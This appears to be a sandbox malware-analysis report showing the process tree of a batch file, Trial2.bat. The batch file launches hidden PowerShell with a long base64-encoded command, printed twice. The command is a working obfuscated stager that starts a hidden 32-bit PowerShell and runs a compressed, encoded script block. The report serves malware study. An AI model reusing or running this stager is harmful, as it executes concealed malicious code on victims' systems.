| ZeroBOX

Behavioral Analysis

Process tree

  • cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "PZFlafErlokfv" C:\Users\test22\AppData\Local\Temp\Trial2.bat

    2576
    • cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\Trial2.bat

      2652
      • cmd.exe C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEATQBIAHsAMQB9ADQAbQBZAEMAQQA3ADEAWABlAFkAKwBqAHgAaABMAC8AUAAxAEsAKwBBADQAbwBzAEcAVwBzADkATgB2AGoAWQBuAFYAbABwAHAAUQBmAFkAKwBJAGoAQgBCADkAagA0AGkAQgBXADEAbwBRADEAdABHAHYAQgBDAE0ANQBqAEoAeQAzAGQALwBoAFkAOAA1AHQATABQAFIASgBsAEoAZQBTADkAWQAwADMAVgBYAFYAVgBiADgANgBaADUAKwBHAE4AaQBOAFIAeQBHAFgAcABwACsARwBTACsAKwBQAG4AbgA3AGoAcgBtAHEAQQBZAEIAUgB4AGYAeQBvADEAewAxAH0AdgA4AHEAVgA4AEwAMwBjAEUAQwBvAHYAMQA2AFYAMAArAHYAdgBoAEUALwBlAEYANAB6AGYAUwA4AGQAaQBKAEEAawBUAEMANwBlAGYAUABTAGgAcgBIAE8ARwBTAFgANwAxAG8AUABNAHkAbABKAGMATABDAGoAQgBDAGQAOABoAGYAcwB2AFoAMwBrADQAeABuACcAJwArACcAJwBmAGoAMwBRAEgAYgBqAFAAdQBEAEsALwAxAGUANgA5AEYAbwBoACsAaQBWAEwARgBlAFEANwBXAEgAdQBUAGcAcQBkADQAbQA0AFUAewAxAH0AYQBqAFEAcgBtAFkAYwBLAFcARgA4ACsAYgBmAGYAeQBwAFgATgBuAGIAaQB0AGQAYgArAG0AaQBDAFoAOAB7ADEAfQBjAGcAVABoAG8ATwBhAFEAewAxAH0AbQA1AHcAdgAxAFoASwBSADQAMAA4AHkAUABtAHkAeABxAHgANAB5AGkASgA5AHEAeABtAGsAYgBEAFoAcQBNADMARABCAE8AJwAnACsAJwAnAHsAMQB9AHgARAB0AEkAZQAnACcAKwAnACcAcwBZAGEAWgBGAHoAbABKAEcAYQB4ADUAcwBTAGYARwBMAEkAMwBEAHEAMQBtAEYAbgBBAHMAVgBYADQAYgB0AEoASQA1AHMAeQBYAEYAaQBuAEMAVABsAEsAcgBjAHAAWAB0AGgAcwB0AC8ALwBoAE4AOQBmAG4AWgB7ADEAfQBuAEkAUwBJAEIAcgBnADUARABoAE8ARABvAGEATwBIADQAawBOAGsANQBxAGYAUgBRADYARgBNAC8AdwBmAGcAdABjAEIAbwB0AEoANgBHADQAcgBGAFMAQgA3AGoASAB6AE0AbAA4AEsAVQAwAGkAcgAzAGQAOABUAHcATwBzADUAdQA0AFAAMABvAEUALwArAGEAQwBhAGcAbQBMAEsANQBVAHcAYQAvAHYARwBhAHAARgBUAGsAcgB4AGgAYgBYADgAagBxACcAJwArACcAJwBiAG4AWQBLAGoAQQBlAGcANABJAHcAUABEAFAAQQBzAGIAOQBMAFkANgBDAHsAMQB9AFQAdABCADkASABKAHcAVwA1AHYAegBEAFEAYQBkACsAVQBtAFUAawBEAFAAcgBGADAANgBvAGMAaABvADgAagBsAGcAVQA1AC8AQgBaAE0AdQBNAFUAVgA3AGIAUABpAEgATwBsAFgASABFAEMAcQAvAHEAagA0AHMAUQBiAEwAMwBDADYANQBwAEgAQwAwAFcAWQBSAEUAVwBmADcASQB1AEIATgBEAEoAUwArAFIAZwBYAEoAOQArAE8ANQBnAC8AYwBrAHgASgAwADgAUgBBAEcAeABiAHkASABMAHYAKwBjAFYAdgBLAGYANABEAEUAagB0AFIAcQBhAEQAZgBuAHoANQBlAG8ARwBkAEQAcQBiAFkAUgBhAHkAQQB1AFEAaQBPAGIAOQBpADYAQQBXAEgAUAB2AEgASgBLAHEASQBOAGoAeQBRAGIAUABKAHEAQQBWAE8ATAAzAHkAVgBwAG0ATAA1AC8AagB5AEkATgBSAHcAQQBPAGgAZAB2AGkARgBhAFMAMwB0AEkARgBIAHkAagB2AGkAWgBIAGYAbgB1ADkAKwBBAGEAaQBzAGsASgBSAGsAbABTADUAUwBRAHEAWgBhAGwAYwA1AEEAJwAnACsAJwAnAHkATwBLAG4AUwBvAG4AaABRAG0ANQAnACcAKwAnACcAWABrAGsAcABpADgANwBiADgAbwB1ADYAVwBrAG8AWgBzAFYASABDAGIAdQBLAHsAMQB9AGwAVABkAGcAWABoADkAVgBvAGoAQgBoAGMAVwBxAEQAVgB3AEUAQQAwAHoAaABpAG0AeQBCAGEANABGAEgAbAArAHMAVABCAGMAbQA0AFEAOQAvAFoANAArAFYAMAAwAEYARQBRAHAAWgBBADkASQBlAGcAUgB2AHcARQBtAEIAZwBzAEcASwBXAEkAbABCAHoAMAB0AGMAVgBHAG8ARwBaAG8AUABnAFMASABFAEEAUgBPAGYAQwBvAFYATABrAFEAcABtADQASgBzAGsANQB1AHAAQwBMAG4AZgBLADcAZQB0ADQAUwA0AFIATAAxAEIAUwB3ADMAUABGADUAcABDAGIANAB7ADEAfQBhAE0AUwBxADMASQBMAEUARABJAHAAUQBBAFgARQBSAFcALwA5AE0AaQBXAC8AcgBEAHsAMQB9AGkAagB4AFAAagBxAEcAdgA2AFcAWABoAHMANQBaADAAVQBHAGwAQQA1AEoAMQAwACsASwBJAEwAMQBpAGQARQBZAGsAWgBvAEMARwBHAGsAZQBCAGoAQgBMADgAcwBYAFcAcABOAFAAdwB2ADkAVABHAFoAUwBMAEIAVwBnADUAQgBxAHoAdAAnACcAKwAnACcAQQBuADQAaQBDAEQAbgB3ACcAJwArACcAJwBhAC8ATwBXAGsATwBJAG0AMQAvAFAAJwAnACsAJwAnAHsAMQB9AEYAQwBGAEcAaQB7ADEAfQBrAGsAeAA2ADYAcgAxAEUATQBqAGUAegA3ADMAWABKAGQAbwBZAE8AZgBqAEMAJwAnACsAJwAnAEEAYgByAHAAbwBNAFcAVQBpADkAYQBkACcAJwArACcAJwBFAGsARgB1AGUAJwAnACsAJwAnAEwAUQB0AG0AcwBSAGQAZABWADMASgAwAE8ASAAnACcAKwAnACcATgBYAG4AawB7ADEAfQBGAFMAYQBkAGYATgAxAGEASgBRAEwASwArAHAAZABrAGQAKwBTAGwAcgBKAEIAQwBxAHIAVgBaAC8ASwBVAGoATgBaAG0AdgBjAEYASAB6AEEAYgB3AFYAOABQAHYAQQBGAEoARAB1AE4AWQBBADgAbABkAFQAeQBTAEIANABrAHMARABHAGgAMwBxAE0AeAB7ADEAfQBWAGsATgBkAFcANwBSAGYAYgA2AG4AZQAzAG8AbwBTADQAKwBPAHEAVQA2AC8AWABIAHgAegBVAGEAMQBOAEgAawBpAE8AbgBRAFYATwAwAG0ARQBWAG0AMwB3ADcAawBlAG4AewAxAH0AaABPAGMAeQBjAGkANwBvADUALwAwAEMANgBoAFoAewAxAH0AbQA5AGYAQQAnACcAKwAnACcAUgBXAGEAZABrACcAJwArACcAJwBaAGQAeQBMAG8ANABQAGsALwBxAG8ANgB4ADEAMAB3AGUAMwBTAGEAbQBtAHYAUwBxAGEAdQBaAFUAcQBwADEARQBuAGMAQgBjAHYAVABEADkATgBPAGcANwB6AFoAMAB4AFgAZQBuAFMAegBuAGIAOQBSAGIATAB0AFQAVQBjAG8AZQBYADAAVQBUAGUAMQA1AHUAaQBnAE4AUQBhAEsATgB6AEwAVQBtAFcANABxAG0AYgB2AHIAMABYAGgAdAB5AFAAewAxAH0AMQBwAGMAZQA3AEgASABnAGEAWAByADUAcgBpAEgAJwAnACsAJwAnAFQAMAA1AEwAZgBnAHIAVgBUAHYAewAxAH0ATwBKAFkAYQBiAFUAMABRAHoAWgBYADEAdABxAHoAQQAvADkARgBUAG4AZgBoAHIALwBQADcAdABwADYAMwBzAHQARwBoAG0AKwBsAFAAQQAzAGoAZgBsADEARABuAGEARwBHADAAcgA0AHMATAAzAFUAUQB1AHsAMQB9AE4ARQBnAFMAdAArAFYAcABJADkANgBWAHAAagB6AHUARgB1AHUAbQA0ADUAMQBhAHEANAA3ADcAbQBrAHUATABqAFMAYgBxAGkAZQA3AE0AVgB3AHMAbgB5AGkAWgBMAHgAZQBUAHEAYQArAHYANQA0AEQASAByAHQASABXAFUATwBBAGMAVgB2ADQAcwBtADgAOQBQAGEAQwBhAG8AMQBzAGgAcQA1ADkAWgBpADMAWABZAGEAMwBkAFAAcwBTAGMAKwAxAHUAZABxADEARwA4ADUAcQAzAGYASABFAE8AWgBXAFAAUwAwAEYAdABhAEQAMAB7ADEAfQBSAFUASAA3AHUARwB0AEsAdQBkADAAWgBaAHMAaQBuAFEAMQAwADkAbwBvAFUAZwB0AGsAegBMAGwAKwBZADkAYgAwAG4AVwA5AFYANwA5AHcAUgBxAGUAcQBCADUASgAwAGoARAB5AFYATgBCAFQAZABNAHgARgBjAEkAZwBYAFIAdQBzAFQAMwBGAG4ASQBQAGUANwBQAGYAaABEAFgAMABXAGkANgBXAG0ASAB3AEQAYwBTAEsAcQBQAGIASQBvAEEAdQBtAG8ASwA2AFoANgBiAGgAVABGACsAYwBQAFkAZwB0ADcAbwA4AEkANAA1AE0AdQBSAEoATQBPAG0AQgB3AGEARAA5ACsAJwAnACsAJwAnAFkATgBiADMAVgBVAEoAeABUAGsAZwBaAHoAeABzAEMAMAA2AGsAYQBUAEEAdgBhAHAAYgBTAFAANwBWAEkAbgBoAFUARgAxAGQATAB5AGQARQArAGoATwBTAHMAMwB5AG4AawB0AHgAZQBIAHoAdgBLACcAJwArACcAJwBEAFYAeQAvAFcAdQBPAE8AbgBtAHUAawBEADMAbAAxAFIAVgAxAG8AbgB6AFYAeABKAGEAVgAwAFIASQA3AHIAKwBLAHEAbQBUAHUAagBqADkAOAB1AFUAWAB5AEsAYgBOAG4ASQBTAHMAewAxAH0AZABpAFcANABxAHoAbwBOAHoALwAvAFYATgBvADMAJwAnACsAJwAnAEQANgA4AFQANgBuAHYAOQBWAEUATgB4ADQAaQBFAEsAaQBRAFoAOQA4AGwAYgB2ADEAQwAnACcAKwAnACcAaABXAHIANAAxAHYARQBwAEcAQwBnACsAYwB2AGcANQBTAFAANAB4AEIAVABHAEQAeABnAE4ATABtAFYAQwBvAG4AUwB5AEMANQA2AEwALwBSAEkANgBQAHEAWABYAGwAeQBNAEIAdgBQAEIAVwBhAGYAMwBkAGgAWAB1AG0AYgBEAHkAMABwAEIAdgBSADUAOAAvAHIAMABGAEoASwBEACcAJwArACcAJwAzAG4AcwBsAEEAYgA0AGQAQgBsAFgAbABVADQATgBRAFUAQgBXAHEAbAB3AEUAbAByAG4ARwB2AFAAagB0AGkAbgBSAE0AZQBjAHYAMABxAHAARgBOAHoANgBqADgAeQB5AGYAbgB1AFcARABTAEwATABuAGUAUAA3AC8AZwBCAGcATQBYAGcAdwA2AHcAUAAnACcAKwAnACcAYwB3ACsAeAA1ADgAOABMAFEAUAA5AFIAcgA2AHgANgBXAEkARgBpAEQASwBVAFUAUgBmAFEAMwBpADEANwBEAGsAZQAzAGkAQQBJADAASQBsAGcALwBhAGEAWQB1AFMAQgBTAFEATQBBAGQALwBzAHEAVgBXAEQARwBPAHYAQgA1AHYAUwB1ADUANAA5AFMALwBIAHoAcgBVAFoAZQBQAEQASAArAGUAdgBZAGUAVABuADcAaQA5AHMAZgBpAGkAZQBoAGUAawBIAG4AbQArAE8AMwBCADYAKwBhADYATAArAEoAZwBJAFUASQBBADEASQBEAGUAaAByAEYAbAB6AEgAcgBQAFMAQwB1ACsAZgBMAEsAdwArAEEAYwB5AEkAWAA5AGQAUgBYAC8AZgBZAHgAVABkAHEAZgBEAEwASAB2AHUAcQB2ACcAJwArACcAJwA4AEQAVwBWAFIAdABBAHYAcwBNAEEAQQBBAHsAMAB9ACcAJwApAC0AZgAnACcAPQAnACcALAAnACcAMgAnACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQAnADsAJABzAC4AVQBzAGUAUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAPQAkAGYAYQBsAHMAZQA7ACQAcwAuAFIAZQBkAGkAcgBlAGMAdABTAHQAYQBuAGQAYQByAGQATwB1AHQAcAB1AHQAPQAkAHQAcgB1AGUAOwAkAHMALgBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAPQAnAEgAaQBkAGQAZQBuACcAOwAkAHMALgBDAHIAZQBhAHQAZQBOAG8AVwBpAG4AZABvAHcAPQAkAHQAcgB1AGUAOwAkAHAAPQBbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBTAHQAYQByAHQAKAAkAHMAKQA7AA==

        2740
        • powershell.exe powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEATQBIAHsAMQB9ADQAbQBZAEMAQQA3ADEAWABlAFkAKwBqAHgAaABMAC8AUAAxAEsAKwBBADQAbwBzAEcAVwBzADkATgB2AGoAWQBuAFYAbABwAHAAUQBmAFkAKwBJAGoAQgBCADkAagA0AGkAQgBXADEAbwBRADEAdABHAHYAQgBDAE0ANQBqAEoAeQAzAGQALwBoAFkAOAA1AHQATABQAFIASgBsAEoAZQBTADkAWQAwADMAVgBYAFYAVgBiADgANgBaADUAKwBHAE4AaQBOAFIAeQBHAFgAcABwACsARwBTACsAKwBQAG4AbgA3AGoAcgBtAHEAQQBZAEIAUgB4AGYAeQBvADEAewAxAH0AdgA4AHEAVgA4AEwAMwBjAEUAQwBvAHYAMQA2AFYAMAArAHYAdgBoAEUALwBlAEYANAB6AGYAUwA4AGQAaQBKAEEAawBUAEMANwBlAGYAUABTAGgAcgBIAE8ARwBTAFgANwAxAG8AUABNAHkAbABKAGMATABDAGoAQgBDAGQAOABoAGYAcwB2AFoAMwBrADQAeABuACcAJwArACcAJwBmAGoAMwBRAEgAYgBqAFAAdQBEAEsALwAxAGUANgA5AEYAbwBoACsAaQBWAEwARgBlAFEANwBXAEgAdQBUAGcAcQBkADQAbQA0AFUAewAxAH0AYQBqAFEAcgBtAFkAYwBLAFcARgA4ACsAYgBmAGYAeQBwAFgATgBuAGIAaQB0AGQAYgArAG0AaQBDAFoAOAB7ADEAfQBjAGcAVABoAG8ATwBhAFEAewAxAH0AbQA1AHcAdgAxAFoASwBSADQAMAA4AHkAUABtAHkAeABxAHgANAB5AGkASgA5AHEAeABtAGsAYgBEAFoAcQBNADMARABCAE8AJwAnACsAJwAnAHsAMQB9AHgARAB0AEkAZQAnACcAKwAnACcAcwBZAGEAWgBGAHoAbABKAEcAYQB4ADUAcwBTAGYARwBMAEkAMwBEAHEAMQBtAEYAbgBBAHMAVgBYADQAYgB0AEoASQA1AHMAeQBYAEYAaQBuAEMAVABsAEsAcgBjAHAAWAB0AGgAcwB0AC8ALwBoAE4AOQBmAG4AWgB7ADEAfQBuAEkAUwBJAEIAcgBnADUARABoAE8ARABvAGEATwBIADQAawBOAGsANQBxAGYAUgBRADYARgBNAC8AdwBmAGcAdABjAEIAbwB0AEoANgBHADQAcgBGAFMAQgA3AGoASAB6AE0AbAA4AEsAVQAwAGkAcgAzAGQAOABUAHcATwBzADUAdQA0AFAAMABvAEUALwArAGEAQwBhAGcAbQBMAEsANQBVAHcAYQAvAHYARwBhAHAARgBUAGsAcgB4AGgAYgBYADgAagBxACcAJwArACcAJwBiAG4AWQBLAGoAQQBlAGcANABJAHcAUABEAFAAQQBzAGIAOQBMAFkANgBDAHsAMQB9AFQAdABCADkASABKAHcAVwA1AHYAegBEAFEAYQBkACsAVQBtAFUAawBEAFAAcgBGADAANgBvAGMAaABvADgAagBsAGcAVQA1AC8AQgBaAE0AdQBNAFUAVgA3AGIAUABpAEgATwBsAFgASABFAEMAcQAvAHEAagA0AHMAUQBiAEwAMwBDADYANQBwAEgAQwAwAFcAWQBSAEUAVwBmADcASQB1AEIATgBEAEoAUwArAFIAZwBYAEoAOQArAE8ANQBnAC8AYwBrAHgASgAwADgAUgBBAEcAeABiAHkASABMAHYAKwBjAFYAdgBLAGYANABEAEUAagB0AFIAcQBhAEQAZgBuAHoANQBlAG8ARwBkAEQAcQBiAFkAUgBhAHkAQQB1AFEAaQBPAGIAOQBpADYAQQBXAEgAUAB2AEgASgBLAHEASQBOAGoAeQBRAGIAUABKAHEAQQBWAE8ATAAzAHkAVgBwAG0ATAA1AC8AagB5AEkATgBSAHcAQQBPAGgAZAB2AGkARgBhAFMAMwB0AEkARgBIAHkAagB2AGkAWgBIAGYAbgB1ADkAKwBBAGEAaQBzAGsASgBSAGsAbABTADUAUwBRAHEAWgBhAGwAYwA1AEEAJwAnACsAJwAnAHkATwBLAG4AUwBvAG4AaABRAG0ANQAnACcAKwAnACcAWABrAGsAcABpADgANwBiADgAbwB1ADYAVwBrAG8AWgBzAFYASABDAGIAdQBLAHsAMQB9AGwAVABkAGcAWABoADkAVgBvAGoAQgBoAGMAVwBxAEQAVgB3AEUAQQAwAHoAaABpAG0AeQBCAGEANABGAEgAbAArAHMAVABCAGMAbQA0AFEAOQAvAFoANAArAFYAMAAwAEYARQBRAHAAWgBBADkASQBlAGcAUgB2AHcARQBtAEIAZwBzAEcASwBXAEkAbABCAHoAMAB0AGMAVgBHAG8ARwBaAG8AUABnAFMASABFAEEAUgBPAGYAQwBvAFYATABrAFEAcABtADQASgBzAGsANQB1AHAAQwBMAG4AZgBLADcAZQB0ADQAUwA0AFIATAAxAEIAUwB3ADMAUABGADUAcABDAGIANAB7ADEAfQBhAE0AUwBxADMASQBMAEUARABJAHAAUQBBAFgARQBSAFcALwA5AE0AaQBXAC8AcgBEAHsAMQB9AGkAagB4AFAAagBxAEcAdgA2AFcAWABoAHMANQBaADAAVQBHAGwAQQA1AEoAMQAwACsASwBJAEwAMQBpAGQARQBZAGsAWgBvAEMARwBHAGsAZQBCAGoAQgBMADgAcwBYAFcAcABOAFAAdwB2ADkAVABHAFoAUwBMAEIAVwBnADUAQgBxAHoAdAAnACcAKwAnACcAQQBuADQAaQBDAEQAbgB3ACcAJwArACcAJwBhAC8ATwBXAGsATwBJAG0AMQAvAFAAJwAnACsAJwAnAHsAMQB9AEYAQwBGAEcAaQB7ADEAfQBrAGsAeAA2ADYAcgAxAEUATQBqAGUAegA3ADMAWABKAGQAbwBZAE8AZgBqAEMAJwAnACsAJwAnAEEAYgByAHAAbwBNAFcAVQBpADkAYQBkACcAJwArACcAJwBFAGsARgB1AGUAJwAnACsAJwAnAEwAUQB0AG0AcwBSAGQAZABWADMASgAwAE8ASAAnACcAKwAnACcATgBYAG4AawB7ADEAfQBGAFMAYQBkAGYATgAxAGEASgBRAEwASwArAHAAZABrAGQAKwBTAGwAcgBKAEIAQwBxAHIAVgBaAC8ASwBVAGoATgBaAG0AdgBjAEYASAB6AEEAYgB3AFYAOABQAHYAQQBGAEoARAB1AE4AWQBBADgAbABkAFQAeQBTAEIANABrAHMARABHAGgAMwBxAE0AeAB7ADEAfQBWAGsATgBkAFcANwBSAGYAYgA2AG4AZQAzAG8AbwBTADQAKwBPAHEAVQA2AC8AWABIAHgAegBVAGEAMQBOAEgAawBpAE8AbgBRAFYATwAwAG0ARQBWAG0AMwB3ADcAawBlAG4AewAxAH0AaABPAGMAeQBjAGkANwBvADUALwAwAEMANgBoAFoAewAxAH0AbQA5AGYAQQAnACcAKwAnACcAUgBXAGEAZABrACcAJwArACcAJwBaAGQAeQBMAG8ANABQAGsALwBxAG8ANgB4ADEAMAB3AGUAMwBTAGEAbQBtAHYAUwBxAGEAdQBaAFUAcQBwADEARQBuAGMAQgBjAHYAVABEADkATgBPAGcANwB6AFoAMAB4AFgAZQBuAFMAegBuAGIAOQBSAGIATAB0AFQAVQBjAG8AZQBYADAAVQBUAGUAMQA1AHUAaQBnAE4AUQBhAEsATgB6AEwAVQBtAFcANABxAG0AYgB2AHIAMABYAGgAdAB5AFAAewAxAH0AMQBwAGMAZQA3AEgASABnAGEAWAByADUAcgBpAEgAJwAnACsAJwAnAFQAMAA1AEwAZgBnAHIAVgBUAHYAewAxAH0ATwBKAFkAYQBiAFUAMABRAHoAWgBYADEAdABxAHoAQQAvADkARgBUAG4AZgBoAHIALwBQADcAdABwADYAMwBzAHQARwBoAG0AKwBsAFAAQQAzAGoAZgBsADEARABuAGEARwBHADAAcgA0AHMATAAzAFUAUQB1AHsAMQB9AE4ARQBnAFMAdAArAFYAcABJADkANgBWAHAAagB6AHUARgB1AHUAbQA0ADUAMQBhAHEANAA3ADcAbQBrAHUATABqAFMAYgBxAGkAZQA3AE0AVgB3AHMAbgB5AGkAWgBMAHgAZQBUAHEAYQArAHYANQA0AEQASAByAHQASABXAFUATwBBAGMAVgB2ADQAcwBtADgAOQBQAGEAQwBhAG8AMQBzAGgAcQA1ADkAWgBpADMAWABZAGEAMwBkAFAAcwBTAGMAKwAxAHUAZABxADEARwA4ADUAcQAzAGYASABFAE8AWgBXAFAAUwAwAEYAdABhAEQAMAB7ADEAfQBSAFUASAA3AHUARwB0AEsAdQBkADAAWgBaAHMAaQBuAFEAMQAwADkAbwBvAFUAZwB0AGsAegBMAGwAKwBZADkAYgAwAG4AVwA5AFYANwA5AHcAUgBxAGUAcQBCADUASgAwAGoARAB5AFYATgBCAFQAZABNAHgARgBjAEkAZwBYAFIAdQBzAFQAMwBGAG4ASQBQAGUANwBQAGYAaABEAFgAMABXAGkANgBXAG0ASAB3AEQAYwBTAEsAcQBQAGIASQBvAEEAdQBtAG8ASwA2AFoANgBiAGgAVABGACsAYwBQAFkAZwB0ADcAbwA4AEkANAA1AE0AdQBSAEoATQBPAG0AQgB3AGEARAA5ACsAJwAnACsAJwAnAFkATgBiADMAVgBVAEoAeABUAGsAZwBaAHoAeABzAEMAMAA2AGsAYQBUAEEAdgBhAHAAYgBTAFAANwBWAEkAbgBoAFUARgAxAGQATAB5AGQARQArAGoATwBTAHMAMwB5AG4AawB0AHgAZQBIAHoAdgBLACcAJwArACcAJwBEAFYAeQAvAFcAdQBPAE8AbgBtAHUAawBEADMAbAAxAFIAVgAxAG8AbgB6AFYAeABKAGEAVgAwAFIASQA3AHIAKwBLAHEAbQBUAHUAagBqADkAOAB1AFUAWAB5AEsAYgBOAG4ASQBTAHMAewAxAH0AZABpAFcANABxAHoAbwBOAHoALwAvAFYATgBvADMAJwAnACsAJwAnAEQANgA4AFQANgBuAHYAOQBWAEUATgB4ADQAaQBFAEsAaQBRAFoAOQA4AGwAYgB2ADEAQwAnACcAKwAnACcAaABXAHIANAAxAHYARQBwAEcAQwBnACsAYwB2AGcANQBTAFAANAB4AEIAVABHAEQAeABnAE4ATABtAFYAQwBvAG4AUwB5AEMANQA2AEwALwBSAEkANgBQAHEAWABYAGwAeQBNAEIAdgBQAEIAVwBhAGYAMwBkAGgAWAB1AG0AYgBEAHkAMABwAEIAdgBSADUAOAAvAHIAMABGAEoASwBEACcAJwArACcAJwAzAG4AcwBsAEEAYgA0AGQAQgBsAFgAbABVADQATgBRAFUAQgBXAHEAbAB3AEUAbAByAG4ARwB2AFAAagB0AGkAbgBSAE0AZQBjAHYAMABxAHAARgBOAHoANgBqADgAeQB5AGYAbgB1AFcARABTAEwATABuAGUAUAA3AC8AZwBCAGcATQBYAGcAdwA2AHcAUAAnACcAKwAnACcAYwB3ACsAeAA1ADgAOABMAFEAUAA5AFIAcgA2AHgANgBXAEkARgBpAEQASwBVAFUAUgBmAFEAMwBpADEANwBEAGsAZQAzAGkAQQBJADAASQBsAGcALwBhAGEAWQB1AFMAQgBTAFEATQBBAGQALwBzAHEAVgBXAEQARwBPAHYAQgA1AHYAUwB1ADUANAA5AFMALwBIAHoAcgBVAFoAZQBQAEQASAArAGUAdgBZAGUAVABuADcAaQA5AHMAZgBpAGkAZQBoAGUAawBIAG4AbQArAE8AMwBCADYAKwBhADYATAArAEoAZwBJAFUASQBBADEASQBEAGUAaAByAEYAbAB6AEgAcgBQAFMAQwB1ACsAZgBMAEsAdwArAEEAYwB5AEkAWAA5AGQAUgBYAC8AZgBZAHgAVABkAHEAZgBEAEwASAB2AHUAcQB2ACcAJwArACcAJwA4AEQAVwBWAFIAdABBAHYAcwBNAEEAQQBBAHsAMAB9ACcAJwApAC0AZgAnACcAPQAnACcALAAnACcAMgAnACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQAnADsAJABzAC4AVQBzAGUAUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAPQAkAGYAYQBsAHMAZQA7ACQAcwAuAFIAZQBkAGkAcgBlAGMAdABTAHQAYQBuAGQAYQByAGQATwB1AHQAcAB1AHQAPQAkAHQAcgB1AGUAOwAkAHMALgBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAPQAnAEgAaQBkAGQAZQBuACcAOwAkAHMALgBDAHIAZQBhAHQAZQBOAG8AVwBpAG4AZABvAHcAPQAkAHQAcgB1AGUAOwAkAHAAPQBbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBTAHQAYQByAHQAKAAkAHMAKQA7AA==

          2808
